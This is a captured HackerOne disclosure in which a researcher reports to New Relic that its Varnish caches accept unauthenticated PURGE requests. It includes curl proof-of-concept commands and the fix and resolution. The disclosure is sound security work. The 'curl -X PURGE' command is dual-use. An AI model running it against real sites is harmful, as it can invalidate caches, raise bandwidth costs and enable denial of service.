hackerone.com Open in urlscan Pro
2606:4700::6810:6334  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Skip to main content  >

Hacktivity

Opportunities

Directory

Leaderboard

Learn more about HackerOne
Log in


Created with Sketch.
16
#154278
Cache purge requests are not authenticated
 * Share:
 * 
 * 
 * 
 * 
 * 
 * 

Timeline
nuc
submitted a report to New Relic.
July 27, 2016, 8:34am UTC
MenuMenu
Hello there,
Anyone can issue a PURGE request for any resource and invalidate your caches.
That can lead to increased bandwidth costs but also potential Denial of Service
attacks.
Proof
Fetching the resource headers, we can see in the X-Cache that the resource was a
HIT with X-Cache-Hits: 50:
Code 613 BytesUnwrap lines Copy Download
1$ curl -s -D - https://js-agent.newrelic.com/nr-963.min.js -o /dev/null
2HTTP/1.1 200 OK 3x-amz-id-2:
KVV+y19mk83Q4CfPt13sYJ2zss99mslCoWZexamnXBV00JcD1MsMkWyX2TCfutDi
4x-amz-request-id: ECE65200E86566A5 5Last-Modified: Tue, 05 Jul 2016 21:11:47
GMT 6ETag: "c90a1fb4decbee70397700910b871292" 7Content-Type:
application/javascript 8Server: AmazonS3 9Content-Length: 22682 10Accept-Ranges:
bytes 11Date: Wed, 27 Jul 2016 08:30:31 GMT 12Via: 1.1 varnish 13Connection:
keep-alive 14X-Served-By: cache-ams4148-AMS 15X-Cache: HIT 16X-Cache-Hits: 50
17X-Timer: S1469608231.893672,VS0,VE0 18Vary: Accept-Encoding 19Cache-Control:
public, max-age=3600
Unauthenticated cache purge request:
Code 280 BytesUnwrap lines Copy Download
1$ curl -X PURGE https://js-agent.newrelic.com/nr-963.min.js 2{"status": "ok",
"id": "4441-1466032111-45820"}
X-Cache-Hits is now 1:
Code 793 BytesUnwrap lines Copy Download
1$ curl -s -D - https://js-agent.newrelic.com/nr-963.min.js -o /dev/null
10:32:50 2HTTP/1.1 200 OK 3x-amz-id-2:
NywXGsmXU1opvJFZFzvd7S+LJaAqo8Hi8ncv96OY4dBRouEd3U2IeohQKIUtZgxua3VX6VkYt1A=
4x-amz-request-id: 8083D7BD3C05145B 5Last-Modified: Tue, 05 Jul 2016 21:11:47
GMT 6ETag: "c90a1fb4decbee70397700910b871292" 7Content-Type:
application/javascript 8Server: AmazonS3 9Content-Length: 22682 10Accept-Ranges:
bytes 11Date: Wed, 27 Jul 2016 08:32:49 GMT 12Via: 1.1 varnish 13Connection:
keep-alive 14X-Served-By: cache-ams4430-AMS 15X-Cache: HIT 16X-Cache-Hits: 1
17X-Timer: S1469608369.972359,VS0,VE0 18Vary: Accept-Encoding 19Cache-Control:
public, max-age=3600
Thank you, Giorgos
imelven
 posted a comment. 
July 29, 2016, 7:05pm UTC
MenuMenu
Hi, thanks for your report ! We really appreciate you reporting this issue to us
and will begin investigating.
imelven
 posted a comment. 
July 30, 2016, 12:07am UTC
MenuMenu
Hi Giorgos - have you found this on any other sites besides
js-agent.newrelic.com ?
nuc
 posted a comment. 
July 30, 2016, 6:25am UTC
MenuMenu
Hello there,
Any requests that are served via varnish are affected.
Here are a couple more examples:
 * https://www.newrelic.de/assets/application_head-d0a02370d08b464f88ae149b7d3022f4.js
 * https://common.nr-assets.net/common-libs-2.min.js

Giorgos
mlapworth
 changed the status to Triaged. 
August 1, 2016, 5:44pm UTC
MenuMenu
Hi Giorgos,
Our engineering team is working on fixing this issue.
Thanks, Matthew
mlapworth
 closed the report and changed the status to Resolved. 
August 2, 2016, 8:58pm UTC
MenuMenu
Hi Giorgos,
This issue has been resolved. Thank you for reporting it to us!
Cheers, Matthew
nuc
 posted a comment. 
August 2, 2016, 9:09pm UTC
MenuMenu
I can verify it's resolved.
Thanks for the thanks :)
Cheers, Giorgos
imelven
 requested to disclose this report. 
February 18, 2017, 1:41am UTC
MenuMenu

 This report has been disclosed. 
March 20, 2017, 1:42am UTC
MenuMenu
New Relic
 has decided that this report is not eligible for a bounty. 
May 3, 2018, 3:31am UTC
MenuMenu


Reported July 27, 2016, 8:34am UTC


nuc

Participants


Report Id
#154278
Resolved

Reported to
New Relic


--------------------------------------------------------------------------------

Disclosed
March 20, 2017, 1:42am UTC

Severity
No Rating (---)

Weakness
None

Bounty
None

Time spent
None


--------------------------------------------------------------------------------

CVE ID
None

Account de...
None


--------------------------------------------------------------------------------


It looks like your JavaScript is disabled. To use HackerOne, enable JavaScript
in your browser and refresh this page.